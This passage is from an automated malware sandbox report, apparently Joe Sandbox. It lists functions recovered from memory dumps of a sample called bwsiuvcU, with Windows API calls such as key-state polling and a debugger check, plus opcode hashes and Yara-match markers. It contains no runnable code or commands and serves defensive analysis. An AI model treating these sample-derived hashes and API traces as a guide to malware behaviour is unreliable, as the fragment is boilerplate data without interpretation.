                                                                                                                            • Snapshot File: hcaresult_23_2_3becd000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3f0847e1d150f7f63eeda33b739a7756a15e3f6d4724c6775db3ff23cabf1cfd
                                                                                                                            • Instruction ID: 4594ab213faf88a7b3247cf363f580587de1512a65544e89cc2108d635be5070
                                                                                                                            • Opcode Fuzzy Hash: 3f0847e1d150f7f63eeda33b739a7756a15e3f6d4724c6775db3ff23cabf1cfd
                                                                                                                            • Instruction Fuzzy Hash: 4E01807140D3C09FE3128B258D94B52BFB4DF43224F19C1DBD8888F1A3C2695848CB72
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 3BECD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1678600957.000000003BECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 3BECD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_3becd000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8ef26caa7b72dcdbff65820ad3872e5c8261bdde153f33fb9eae65ee8f4ae9ec
                                                                                                                            • Instruction ID: e91b1779e8e6df3da35eec899a7510b57b9e84338c2f1610440104cd7400428b
                                                                                                                            • Opcode Fuzzy Hash: 8ef26caa7b72dcdbff65820ad3872e5c8261bdde153f33fb9eae65ee8f4ae9ec
                                                                                                                            • Instruction Fuzzy Hash: 9A01F2718083089AF3504B6DCE81B57BFD9DF41669F04C01AED494B282C67A9846CAB2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411B50B8 Relevance: .0, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 98fdf435bc4a8a083626a2cc400d63408834598a80cb1a075ef054f723bfd43d
                                                                                                                            • Instruction ID: b3e59e3f29f0c9f49a081b5866ee329d4be9f17ec865532feeea79b30a73623a
                                                                                                                            • Opcode Fuzzy Hash: 98fdf435bc4a8a083626a2cc400d63408834598a80cb1a075ef054f723bfd43d
                                                                                                                            • Instruction Fuzzy Hash: FAF0C939B402048FDB04DB78C568B6D77B2FF89715F158068E5069B3A4DF35AD42CB40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411B2450 Relevance: .0, Instructions: 28COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 10eca54c64d72b28c8f884ae3ac544b73f3730aeb5a12df203a8034e3729a6a7
                                                                                                                            • Instruction ID: e847e3853a02432e725e9fc6993d4c3a1a4d0893d42997afc7c03c4f936d7486
                                                                                                                            • Opcode Fuzzy Hash: 10eca54c64d72b28c8f884ae3ac544b73f3730aeb5a12df203a8034e3729a6a7
                                                                                                                            • Instruction Fuzzy Hash: 67E09A313502148FD744EBBCE8089A97BE9EF4922130580A5F60ECB361EE21DC00CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411B2440 Relevance: .0, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b0cf96c16c30ec9d19e1d1192e3a22083537b102fc9b5573d6e5d95817f83d19
                                                                                                                            • Instruction ID: b0cf8452cc7848e09b6a0a23bd1667aa97fd5b014bf114a1f838cbeecb600bce
                                                                                                                            • Opcode Fuzzy Hash: b0cf96c16c30ec9d19e1d1192e3a22083537b102fc9b5573d6e5d95817f83d19
                                                                                                                            • Instruction Fuzzy Hash: C6E0D8717442004FE394ABB8D5486793BE5BF082117018195E60DDB261EF34CC01C715
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000002.1639938993.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000017.00000002.1639938993.000000000044B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2579439406-0
                                                                                                                            • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                            • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                            • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                            • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41D67A03 Relevance: 4.6, APIs: 3, Instructions: 76keyboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetKeyState.USER32(00000010), ref: 41D67A55
                                                                                                                            • GetKeyState.USER32(00000011), ref: 41D67A9A
                                                                                                                            • GetKeyState.USER32(00000012), ref: 41D67ADF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684983317.0000000041D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 41D60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41d60000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: State
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1649606143-0
                                                                                                                            • Opcode ID: 1ebfba9928a6471fa667b7a867935e80e316a588997bd41c7b472bc88aa0ba01
                                                                                                                            • Instruction ID: b61230c2dec6838a87a046b14914864a1290fcf92552f19e3a5c396b0899c392
                                                                                                                            • Opcode Fuzzy Hash: 1ebfba9928a6471fa667b7a867935e80e316a588997bd41c7b472bc88aa0ba01
                                                                                                                            • Instruction Fuzzy Hash: EA315CB5C0074A8FEB21DF9AC5453DFBFF8AB04315F21845AD599A7240C3B89645CFA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41D67A08 Relevance: 4.6, APIs: 3, Instructions: 76keyboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetKeyState.USER32(00000010), ref: 41D67A55
                                                                                                                            • GetKeyState.USER32(00000011), ref: 41D67A9A
                                                                                                                            • GetKeyState.USER32(00000012), ref: 41D67ADF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684983317.0000000041D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 41D60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41d60000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: State
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1649606143-0
                                                                                                                            • Opcode ID: 5b2462859de10a362f3c8b9463aac6f26be4daa9ac3fc9c9d09b36e3c9c42b05
                                                                                                                            • Instruction ID: 20ad7da495ad3c2091d46c0d61fd4eaaaa06db61d28abcfc718d44d33974ca61
                                                                                                                            • Opcode Fuzzy Hash: 5b2462859de10a362f3c8b9463aac6f26be4daa9ac3fc9c9d09b36e3c9c42b05
                                                                                                                            • Instruction Fuzzy Hash: 2B319FB0C0074A8FEB10DF9AC54539FBFF8AF04314F21841AD458A7240C3B89645CFA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000002.1639938993.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000017.00000002.1639938993.000000000044B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$FreeProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3859560861-0
                                                                                                                            • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                            • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                            • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                            • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000002.1639938993.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000017.00000002.1639938993.000000000044B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3192549508-0
                                                                                                                            • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                            • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                            • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                            • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                            • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,3BE91980), ref: 004170C5
                                                                                                                            • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                            • _malloc.LIBCMT ref: 0041718A
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                            • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                            • _malloc.LIBCMT ref: 0041724C
                                                                                                                            • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                            • __freea.LIBCMT ref: 004172A4
                                                                                                                            • __freea.LIBCMT ref: 004172AD
                                                                                                                            • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                            • ___convertcp.LIBCMT ref: 00417309
                                                                                                                            • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                            • _malloc.LIBCMT ref: 00417362
                                                                                                                            • _memset.LIBCMT ref: 00417384
                                                                                                                            • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                            • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                            • __freea.LIBCMT ref: 004173CF
                                                                                                                            • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3809854901-0
                                                                                                                            • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                            • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                            • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                            • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 004057DE
                                                                                                                              • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                              • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                              • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                            • _malloc.LIBCMT ref: 00405842
                                                                                                                            • _malloc.LIBCMT ref: 00405906
                                                                                                                            • _malloc.LIBCMT ref: 00405930
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc$AllocateHeap
                                                                                                                            • String ID: 1.2.3
                                                                                                                            • API String ID: 680241177-2310465506
                                                                                                                            • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                            • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                            • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                            • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3886058894-0
                                                                                                                            • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                            • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                            • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                            • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004017E0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EntryPoint.BWSIUVCU(80070057), ref: 004017EE
                                                                                                                              • Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
                                                                                                                              • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                                                            • EntryPoint.BWSIUVCU(80070057), ref: 00401800
                                                                                                                            • EntryPoint.BWSIUVCU(80070057), ref: 00401813
                                                                                                                            • __recalloc.LIBCMT ref: 00401828
                                                                                                                            • EntryPoint.BWSIUVCU(8007000E), ref: 00401839
                                                                                                                            • EntryPoint.BWSIUVCU(8007000E), ref: 00401853
                                                                                                                            • _calloc.LIBCMT ref: 00401861
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1721462702-0
                                                                                                                            • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                            • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                                                            • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                            • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 00414744
                                                                                                                              • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                              • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                            • __getptd.LIBCMT ref: 0041475B
                                                                                                                            • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                            • __lock.LIBCMT ref: 00414779
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                            • String ID: @.B
                                                                                                                            • API String ID: 3521780317-470711618
                                                                                                                            • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                            • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                            • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                            • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                            • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                            • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                            • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                            • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                              • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                              • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2805327698-0
                                                                                                                            • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                            • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                            • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                            • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 00413FD8
                                                                                                                              • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                              • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                            • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                            • __lock.LIBCMT ref: 00414008
                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                            • InterlockedIncrement.KERNEL32(3BE91720), ref: 00414050
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4271482742-0
                                                                                                                            • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                            • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                            • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                            • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
